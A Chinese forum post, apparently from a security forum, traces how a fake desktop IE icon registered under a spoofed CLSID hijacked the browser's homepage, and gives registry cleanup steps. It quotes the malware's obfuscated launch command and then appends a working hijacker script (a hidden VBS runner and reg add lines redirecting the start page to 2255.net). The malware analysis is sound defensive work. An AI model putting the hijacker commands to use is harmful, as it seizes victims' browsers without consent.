恶意首页追踪之旅
(先说下,360无法修复这个恶意首页)

话说,今天下了个扫站的工具,结果一不小心中了恶意广告!

中招后不停的乱下东西安装,360不停的在那弹出提示!

无语了,一个个卸载,把C:\windows\svchost.exe 和 svcho.exe 删除,然后打上免疫!

可是打开IE就傻了,以前主页明明是hao123(呵呵,还是习惯导航老祖宗),打开却跳到了一个垃圾导航
http://06000.cn/xy.htm,这种恶意修改,看到就烦!

打开属性看主页,没问题啊..就是 hao123 !

懒的手动改,用360修复首页试了试,汗一个   ,没反应,看来只得动手了!

右键IE图标,点"属性"的确弹出的是设置属性对话框,而并非是个快捷方式传参式冒充,而且
主页就是hao123!

在注册表中搜 http://06000.cn/xy.htm 没有相关结果

再打开IE看看, 发现有跳转 先是 http://g1476.cn 然后才跳到 http://06000.cn/xy.htm

好,那就搜 g1476.cn

还是没结果!

MS还有点棘手, 打开桌面自定义,发现IE并未打勾,然后就打上勾保存,发现桌面多出了一个IE图标

还真是山寨,而且是仿真版的,平常都是个快捷方式,这回还出新花招了!

(右键点这个山寨IE, 菜单中有删除, 但删除没一点反应)

顺便说一下,桌面的 "我的电脑","回收站","IE" 并非是文件或文件夹(dir一下"%userprofile%\桌面"就知道了),
而是桌面特殊项,每一个都对应一个类标识符,相关信息存在注册表中!

定位到 桌面的特殊项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID
瞅了下,没什么变化!

再定位到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

问题出来了: {3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 这个好陌生

虽然桌面的特殊项没能力记忆下来,但是这个开头的{3D3D 一点印象都没

打开它的值,发现是 Internet Explorer

??? 难道记错了?

看来得确认一下IE的类标识到底是多少,把真正的IE名字改成Internet Explorers,
注册表中搜索新IE名字--Internet Explorers,

定位到了的真正的类标识符是 {871C5380-42A0-1069-A2EA-08002B30309D}

确定了,那个{3D3D..还真是高仿山寨!

到此,还不死心,还得看看它到底是怎么隐蔽修改我的IE首页:

到 HKEY_CLASSES_ROOT\CLSID 搜索{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45}

出来了:

DefaultIcon 对应的IE图标项
shell\D\command 对应菜单中的删除选项(关联的程序是Rundll32.exe,没传参,这就是在在桌面右键删除山寨IE无效
的原因啦)
属性(&R) 对应的就是IE设置对话框 其值 为Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl
(就是打开IE设置的对话框了)
ShellFolder  里设定它的属性

open 这就是IE被窜改的根源了,它的 command值为

C:\Program Files\Internet Explorer\iexplore.exe %1 h%t%t%p%:%/%/%g%11%14%17%16%.%c%n%

好晕,又是这种密文,把%1 和%去掉 后就是恶意首页了 http://g1476.cn 大家可别上,小心中招!

到此,恶意修改的根源就抓到了!

解决方法:

搜索注册表,删除搜到的{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 全部信息 即可!

首页被恶意窜改的手段很多...有时候工具也会失效,还得靠自己的双手!转载请注明出自饭客安全论坛 -  http://bbs.hackfans.com.cn/,本贴地址:http://bbs.hackfans.com.cn/viewthread.php?tid=45933

=====================================================================================

IE修改器

dat文件
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\home.cmd", 0, TRUE)

COM文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.2255.net/?ysd222" /f

注册表-恶意首页追踪之旅(IE不能改主页)的更多相关文章

  1. 注册表 锁IE首页

    用附件中的修改软件,或者用以下修改注册表的办法.   一.注册表被修改的原因及解决办法 其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果. ...

  2. 详解Windows注册表分析取证

    大多数都知道windows系统中有个叫注册表的东西,但却很少有人会去深入的了解它的作用以及如何对它进行操作.然而对于计算机取证人员来说注册表无疑是块巨大的宝藏.通过注册表取证人员能分析出系统发生了什么 ...

  3. c#_自动化测试 (五) 读写64位操作系统的注册表

    非Web程序(桌面程序)的设置一般都存在注册表中. 给这些程序做自动化测试时, 需要经常要跟注册表打交道. 通过修改注册表来修改程序的设置. 本章介绍如何利用C#程序如何操作注册表, 特别是如何操作6 ...

  4. Delphi在win7/vista下写注册表等需要管理员权限的解决方案

    看到论坛好多人问win7下写注册表的问题,我结合自己的理解写了一点东西,首先声明一下,本人初学Delphi,水平有限,大家见笑了,有什么不对之处请老鸟多指点. [背景]win7/Vista提供的UAC ...

  5. SetCookies, cookie规范注册表和cookie存储将会优先于设置在HTTP客户端级别中默认的那些

    遇到下面问题解决方法: Hey? 404 抱歉,你输入的网址可能不正确,或者该网页不存在. 7 秒后返回首页 使用独立的本地执行上下文来实现对每个用户(或每个线程)状态的管理. 定义在本地内容中的co ...

  6. [转帖]Windows注册表内容详解

    Windows注册表内容详解 来源:http://blog.sina.com.cn/s/blog_4d41e2690100q33v.html 对 windows注册表一知半解 不是很清晰 这里学习一下 ...

  7. 入侵检测中需要监控的注册表路径研究(Windows Registry Security Check)

    1. Windows注册表简介 注册表(Registry,繁体中文版Windows称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息.早在Wind ...

  8. Window权限维持(一):注册表运行键

    在红队行动中在网络中获得最初的立足点是一项耗时的任务.因此,持久性是红队成功运作的关键,这将使团队能够专注于目标,而不会失去与指挥和控制服务器的通信.在Windows登录期间创建将执行任意负载的注册表 ...

  9. Ruby Rails学习中:注册表单,注册失败,注册成功

    接上篇 一. 注册表单 用户资料页面已经可以访问了, 但内容还不完整.下面我们要为网站创建一个注册表单. 1.使用 form_for 注册页面的核心是一个表单, 用于提交注册相关的信息(名字.电子邮件 ...

随机推荐

  1. CoreBluetooth - TouchID应用

    支持系统和机型: iOS系统的指纹识别功能最低支持的机型为iPhone 5s,最低支持系统为iOS 8, 虽然安装iOS 7系统的5s机型可以使用系统提供的指纹解锁功能,但由于API并未开放,所以理论 ...

  2. HDU 1560 DNA sequence (IDA* 迭代加深 搜索)

    题目地址:http://acm.hdu.edu.cn/showproblem.php?pid=1560 BFS题解:http://www.cnblogs.com/crazyapple/p/321810 ...

  3. 肾果手机App Store切换区域(无需Visa或者万事达)

    8月份在肾果官网买了个touch6,有时候需要换区去墙外下载app,然而一个个国家都要输入Visa或者万事达卡...今天终于找到一个不用输入信用卡号的区域:Canada!!! 办法(适用于8.X,7. ...

  4. c++中的static关键字

    1.在函数体中,一个被声明为静态的变量在这一函数被调用的过程中维持其值不变. 2.在模块内(但在函数外),比如在某一个C源文件内,一个被声明为静态的变量可以被该模块内的所有函数调用,但不能被模块外的函 ...

  5. 在MAC中安装Compass的方法 (转)

    在MAC中通过gem命令安装compass时会出异常,原因是compass版本更新了,一些运行时所用到的依赖软件的版本没能得到更新,故而出现错误.例如,用以下命令安装compass: $ gem in ...

  6. AForm — 模型驱动的自动化表单解决方案

    http://xiehuiqi220.github.io/AForm/doc/book/#

  7. BZOJ 1709: [Usaco2007 Oct]Super Paintball超级弹珠

    Description 奶牛们最近从著名的奶牛玩具制造商Tycow那里,买了一套仿真版彩弹游戏设备(类乎于真人版CS). Bessie把她们玩游戏草坪划成了N * N(1 <= N<= 1 ...

  8. Burp Suite Walkthrough(中文版)

    Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查.本文将做一个Bu ...

  9. android 为组件添加contextMenu上下文菜单

    package com.example.fragmentNavigation2.fragment; import android.os.Bundle; import android.support.v ...

  10. github Git 原理简介

    由于Git是一个DVCS(Distributed Version Control System,分布式版本控制系统),不同于传统的CVS/SVN版本系统那样必须由一个中央服务器来管理所有的版本记录,它 ...